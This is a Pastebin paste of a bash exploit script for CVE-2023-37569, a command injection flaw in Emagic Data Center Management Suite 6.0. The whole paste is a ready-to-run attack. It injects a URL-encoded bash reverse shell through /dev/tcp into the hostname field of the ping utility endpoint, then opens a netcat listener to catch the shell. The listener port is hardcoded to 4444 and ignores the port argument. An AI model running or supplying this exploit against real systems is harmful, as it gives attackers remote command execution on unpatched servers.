Advertisement
FlyFar

Emagic Data Center Management Suite v6.0 - OS Command Injection - CVE-2023-37569

Jan 21st, 2024
1,037
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.18 KB | Cybersecurity | 0 0
  1. #!/bin/bash
  2.  
  3. # Exploit Title: Emagic Data Center Management Suite v6.0 - OS Command Injection
  4. # Date: 03-08-2023
  5. # Exploit Author: Shubham Pandey & thewhiteh4t
  6. # Vendor Homepage: https://www.esds.co.in/enlight360
  7. # Version: 6.0.0
  8. # Tested on: Kali Linux
  9. # CVE : CVE-2023-37569
  10.  
  11. URL=$1
  12. LHOST=$2
  13. LPORT=$3
  14.  
  15. echo "*****************************"
  16. echo "*  ESDS eMagic 6.0.0 RCE    *"
  17. echo "*  > CVE-2023-37569         *"
  18. echo "*  > Shubham & thewhiteh4t  *"
  19. echo "*****************************"
  20.  
  21. if [ $# -lt 3 ]; then
  22.     echo """
  23. USAGE :
  24.  
  25. ./exploit.sh http://<IP> <LHOST> <LPORT>
  26. ./exploit.sh http://192.168.0.10 192.168.0.20 1337
  27. """
  28.     exit 1
  29. fi
  30.  
  31. url="$1/index.php/monitor/operations/utilities/"
  32.  
  33. echo "[+] URL   : $URL"
  34. echo "[+] LHOST : $LHOST"
  35. echo "[+] LPORT : $LPORT"
  36. echo
  37.  
  38. payload="bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F$LHOST%2F$LPORT%200%3E%261%27"
  39.  
  40. post_data="utility=ping&operations=yes&hostname=%3B%20$payload&param_before=&param_after=&probe_id=1&rndval=1682490204846"
  41.  
  42. echo "[!] Triggering exploit..."
  43.  
  44. echo $url
  45.  
  46. (sleep 3; curl -s -X POST -d $post_data $url > /dev/null) &
  47.  
  48. echo "[+] Catching shell..."
  49. nc -lvp 4444
  50.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement